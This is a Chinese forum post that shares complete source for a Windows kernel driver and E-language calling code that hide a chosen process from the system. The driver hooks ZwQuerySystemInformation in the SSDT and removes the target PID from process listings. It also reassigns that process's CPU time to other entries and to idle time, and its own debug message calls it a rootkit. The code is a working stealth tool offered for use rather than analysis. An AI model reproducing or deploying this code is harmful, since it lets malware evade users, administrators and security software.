|
|
驱动在 WDK 7600.16385.0 编译通过.
易语言编译的模块提供了3个接口:
驱动操作.加载 ("服务名[文本型]", "驱动名[文本型]", "驱动路径[文本型]")
驱动操作.通信 ("驱动指令[整数型]", "输入缓冲指针[整数型]", "输入缓冲长度[整数型]", "输出缓冲指针[整数型]", "输出缓冲长度[整数型]")
驱动操作.卸载 ()
调用代码也很简单:
.版本 2
.程序集 窗口程序集1
.程序集变量 驱动, 驱动操作
.程序集变量 ProcessId, 整数型
.子程序 __启动窗口_创建完毕
.如果真 (取反 (驱动.加载 (“HideProcess”, “//./HideProcess”, 取运行目录 () + “\HideProcess.sys”)))
信息框 (“加载驱动失败!”, #错误图标, “错误”)
结束 ()
.如果真结束
.子程序 __启动窗口_将被销毁
ProcessId = 0
驱动.通信 (4096, lstrcpyn (ProcessId, ProcessId, 0), 4, 0, 0)
.子程序 _开关_被单击
.如果 (开关.标题 = “HideOff”)
ProcessId = 0
.如果真 (驱动.通信 (4096, lstrcpyn (ProcessId, ProcessId, 0), 4, 0, 0))
开关.标题 = “HideOn”
.如果真结束
.否则
ProcessId = GetCurrentProcessId ()
.如果 (取反 (驱动.通信 (4096, lstrcpyn (ProcessId, ProcessId, 0), 4, 0, 0)))
信息框 (“隐藏失败!”, #错误图标, “错误”)
.否则
开关.标题 = “HideOff”
.如果结束
驱动实现如下:
- #include "ntddk.h"
- #include "drvcommon.h"
- #pragma pack(1)
- typedef struct ServiceDescriptorEntry {
- unsigned int *ServiceTableBase;
- unsigned int *ServiceCounterTableBase;
- unsigned int NumberOfServices;
- unsigned char *ParamTableBase;
- } ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
- #pragma pack()
- __declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;
- #define SYSTEMSERVICE(_function) KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_function+1)]
- PMDL g_pmdlSystemCall;
- PVOID *MappedSystemCallTable;
- #define SYSCALL_INDEX(_Function) *(PULONG)((PUCHAR)_Function+1)
- #define HOOK_SYSCALL(_Function, _Hook, _Orig ) \
- _Orig = (PVOID) InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)
- #define UNHOOK_SYSCALL(_Function, _Hook, _Orig ) \
- InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)
- struct _SYSTEM_THREADS
- {
- LARGE_INTEGER KernelTime;
- LARGE_INTEGER UserTime;
- LARGE_INTEGER CreateTime;
- ULONG WaitTime;
- PVOID StartAddress;
- CLIENT_ID ClientIs;
- KPRIORITY Priority;
- KPRIORITY BasePriority;
- ULONG ContextSwitchCount;
- ULONG ThreadState;
- KWAIT_REASON WaitReason;
- };
- struct _SYSTEM_PROCESSES
- {
- ULONG NextEntryDelta;
- ULONG ThreadCount;
- ULONG Reserved[6];
- LARGE_INTEGER CreateTime;
- LARGE_INTEGER UserTime;
- LARGE_INTEGER KernelTime;
- UNICODE_STRING ProcessName;
- KPRIORITY BasePriority;
- ULONG ProcessId;
- ULONG InheritedFromProcessId;
- ULONG HandleCount;
- ULONG Reserved2[2];
- VM_COUNTERS VmCounters;
- IO_COUNTERS IoCounters;
- struct _SYSTEM_THREADS Threads[1];
- };
- struct _SYSTEM_PROCESSOR_TIMES
- {
- LARGE_INTEGER IdleTime;
- LARGE_INTEGER KernelTime;
- LARGE_INTEGER UserTime;
- LARGE_INTEGER DpcTime;
- LARGE_INTEGER InterruptTime;
- ULONG InterruptCount;
- };
- NTSYSAPI
- NTSTATUS
- NTAPI ZwQuerySystemInformation(
- IN ULONG SystemInformationClass,
- IN PVOID SystemInformation,
- IN ULONG SystemInformationLength,
- OUT PULONG ReturnLength);
- typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)(
- ULONG SystemInformationCLass,
- PVOID SystemInformation,
- ULONG SystemInformationLength,
- PULONG ReturnLength
- );
- ZWQUERYSYSTEMINFORMATION OldZwQuerySystemInformation;
- ULONG pid = 0;
- PDRIVER_OBJECT pdoGlobalDrvObj = 0;
- LARGE_INTEGER m_UserTime;
- LARGE_INTEGER m_KernelTime;
- #define DEVICE_NAME "\\Device\\HideProcess"
- #define SYMLINK_NAME "\\DosDevices\\HideProcess"
- PRESET_UNICODE_STRING(usDeviceName, DEVICE_NAME);
- PRESET_UNICODE_STRING(usSymlinkName, SYMLINK_NAME);
- NTSTATUS NewZwQuerySystemInformation(
- IN ULONG SystemInformationClass,
- IN PVOID SystemInformation,
- IN ULONG SystemInformationLength,
- OUT PULONG ReturnLength)
- {
- NTSTATUS ntStatus;
- ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) (
- SystemInformationClass,
- SystemInformation,
- SystemInformationLength,
- ReturnLength );
- if( NT_SUCCESS(ntStatus))
- {
- if(SystemInformationClass == 5)
- {
- struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
- struct _SYSTEM_PROCESSES *prev = NULL;
-
- while(curr)
- {
- if (curr->ProcessId != 0 && pid != 0)
- {
- if(curr->ProcessId == pid)
- {
- m_UserTime.QuadPart += curr->UserTime.QuadPart;
- m_KernelTime.QuadPart += curr->KernelTime.QuadPart;
- if(prev)
- {
- if(curr->NextEntryDelta)
- prev->NextEntryDelta += curr->NextEntryDelta;
- else
- prev->NextEntryDelta = 0;
- }
- else
- {
- if(curr->NextEntryDelta)
- {
- (char *)SystemInformation += curr->NextEntryDelta;
- }
- else
- SystemInformation = NULL;
- }
- }
- }
- else
- {
- curr->UserTime.QuadPart += m_UserTime.QuadPart;
- curr->KernelTime.QuadPart += m_KernelTime.QuadPart;
- m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;
- }
- prev = curr;
- if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta);
- else curr = NULL;
- }
- }
- else if (SystemInformationClass == 8)
- {
- struct _SYSTEM_PROCESSOR_TIMES * times = (struct _SYSTEM_PROCESSOR_TIMES *)SystemInformation;
- times->IdleTime.QuadPart += m_UserTime.QuadPart + m_KernelTime.QuadPart;
- }
- }
- return ntStatus;
- }
- VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
- {
- DbgPrint("ROOTKIT: OnUnload called\n");
- UNHOOK_SYSCALL( ZwQuerySystemInformation, OldZwQuerySystemInformation, NewZwQuerySystemInformation );
- if(g_pmdlSystemCall)
- {
- MmUnmapLockedPages(MappedSystemCallTable, g_pmdlSystemCall);
- IoFreeMdl(g_pmdlSystemCall);
- }
- }
- NTSTATUS OnDispatchCreateClose(
- IN PDEVICE_OBJECT DeviceObject,
- IN PIRP Irp
- )
- {
- NTSTATUS status = STATUS_SUCCESS;
- Irp->IoStatus.Status = status;
- Irp->IoStatus.Information = 0;
- IoCompleteRequest(Irp, IO_NO_INCREMENT);
- return status;
- }
- NTSTATUS OnDispatchDeviceControl(
- IN PDEVICE_OBJECT DeviceObject,
- IN PIRP Irp
- )
- {
- NTSTATUS status = STATUS_SUCCESS;
- PIO_STACK_LOCATION irpSp = IoGetCurrentIrpStackLocation(Irp);
- switch(irpSp->Parameters.DeviceIoControl.IoControlCode)
- {
- case 0x1000:
- pid = *(PULONG)Irp->AssociatedIrp.SystemBuffer;
- break;
- default:
- Irp->IoStatus.Status = STATUS_INVALID_DEVICE_REQUEST;
- Irp->IoStatus.Information = 0;
- pid = 0;
- break;
- }
- status = Irp->IoStatus.Status;
- IoCompleteRequest(Irp, IO_NO_INCREMENT);
- return status;
- }
- NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject,
- IN PUNICODE_STRING theRegistryPath)
- {
- PDEVICE_OBJECT pdoDeviceObj = 0;
- NTSTATUS status = STATUS_UNSUCCESSFUL;
- pdoGlobalDrvObj = theDriverObject;
- if(!NT_SUCCESS(status = IoCreateDevice(
- theDriverObject,
- 0,
- &usDeviceName,
- FILE_DEVICE_UNKNOWN,
- FILE_DEVICE_SECURE_OPEN,
- FALSE,
- &pdoDeviceObj
- )))
- {
- return status;
- };
- if(!NT_SUCCESS(status = IoCreateSymbolicLink(
- &usSymlinkName,
- &usDeviceName
- )))
- {
- IoDeleteDevice(pdoDeviceObj);
- return status;
- }
- theDriverObject->MajorFunction[IRP_MJ_CREATE] =
- theDriverObject->MajorFunction[IRP_MJ_CLOSE] = OnDispatchCreateClose;
- theDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = OnDispatchDeviceControl;
- theDriverObject->DriverUnload = OnUnload;
- m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;
- OldZwQuerySystemInformation =(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));
- g_pmdlSystemCall = MmCreateMdl(NULL, KeServiceDescriptorTable.ServiceTableBase, KeServiceDescriptorTable.NumberOfServices*4);
- if(!g_pmdlSystemCall)
- return STATUS_UNSUCCESSFUL;
- MmBuildMdlForNonPagedPool(g_pmdlSystemCall);
- g_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;
- MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode);
- HOOK_SYSCALL( ZwQuerySystemInformation, NewZwQuerySystemInformation, OldZwQuerySystemInformation );
-
- return STATUS_SUCCESS;
- }
|
|
雷达卡
发表于 2024-12-27 21:22:35
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶